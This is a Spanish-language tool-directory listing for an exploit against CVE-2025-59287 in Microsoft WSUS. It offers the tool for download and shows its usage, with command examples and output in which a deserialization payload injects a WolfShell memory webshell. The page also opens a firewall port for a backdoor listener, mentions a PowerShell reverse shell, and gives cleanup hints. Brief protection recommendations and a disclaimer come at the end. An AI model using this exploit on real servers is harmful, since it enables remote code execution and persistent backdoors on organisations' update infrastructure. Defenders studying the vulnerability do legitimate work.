Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-59287 — Exploit para CVE-2025-59287, que inyecta un webshell de memoria WolfShell en servidores WSUS para lograr ejecución remota de código cuando se abre la consola de administración. | Kitploit
Herramientas/GitHubGitHub/0x7556/cve-2025-59287
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHub0x7556/cve-2025-59287

CVE-2025-59287

Exploit para CVE-2025-59287, que inyecta un webshell de memoria WolfShell en servidores WSUS para lograr ejecución remota de código cuando se abre la consola de administración.

Ver Repositorio
73hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Reproducción de la vulnerabilidad CVE-2025-59287 en WSUS

CVE-2025-59287 — Inyección de WolfShell Wolverine memory shell directo

Resumen

CVE-2025-59287 aprovecha una falla lógica en los componentes relacionados con WSUS para inyectar un memory shell de WolfShell en el servidor objetivo. Cuando un administrador abre la consola de WSUS (se activa de forma predeterminada en un tiempo aleatorio de 1 a 30 minutos), el memory shell se activa y provoca la ejecución remota de código (RCE). Este documento incluye ejemplos de explotación, archivos necesarios y recomendaciones de protección.

Ejemplo de uso

Uso

Envíe el payload de deserialización de ysoserial.net al servidor objetivo, con funcionalidad personalizable. Este proyecto demuestra la inyección del memory shell Wolverine.

root@kitploit:~
Usage: CVE-2025-59287 <target_url> <payload_file>

Ejemplo de inyección del WebShell ASPX de Wolverine

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 wolfaspx.txt

Ejemplo de inyección en memoria del WolfShell directo de Wolverine

root@kitploit:~
C:\Users\Administrator\Desktop\>CVE-2025-59287 http://192.168.50.159:8530 wolfshell.txt
[+] Target: http://192.168.50.159:8530/
[+] Payload read successfully, length: 20413 characters

[+] Getting Server ID...
[+] Server ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Auth cookie with Server ID...
[+] Using ID: c37d5d65-6460-4543-b7f2-f6414a3c36f9
[+] Sending event with payload...
[+] SUCCESS!
[!] RCE will trigger when you open the WSUS console!
[!] to cleanup remove the hawktrace.local computer from WSUS

Ejemplo de habilitación del puerto 7556 en el firewall

root@kitploit:~
CVE-2025-59287 http://192.168.50.159:8530 allow7556.txt

exp

Reverse shell de PowerShell

win2019 Defender lo bloquea y elimina, no se puede usar Defende

Abrir la consola de WSUS para activar la vulnerabilidad

Como se muestra en la imagen, la escucha exitosa en el puerto 7556 indica que el memory shell directo de Wolverine se ha inyectado WolfDoor 1

Conexión de Wolverine al memory shell para ejecutar comandos CMD

WolfDoor 2

Recomendaciones de protección

  • Aplique inmediatamente el parche proporcionado por el proveedor o las medidas de mitigación temporales a los servidores WSUS afectados.
  • Revise y elimine los clientes sospechosos en WSUS (por ejemplo, hawktrace.local).
  • Restrinja y audite el acceso a la consola de administración de WSUS, asegurando que solo administradores de confianza puedan acceder.
  • Utilice herramientas de detección de intrusiones, escaneo de memoria y monitoreo de integridad del host para detectar memory shells anómalos o módulos sospechosos.
  • Antes de aplicar el parche, evite abrir la consola de WSUS o procesar elementos de actualización sospechosos en entornos no confiables.

Descargo de responsabilidad

Este documento es solo para fines de investigación de seguridad y protección. No utilice el código de explotación relacionado en sistemas no autorizados o actividades de ataque.

Enlaces de referencia

https://github.com/0x7556/wolfshell https://github.com/0x7556/CVE-2025-59287

Descargar herramienta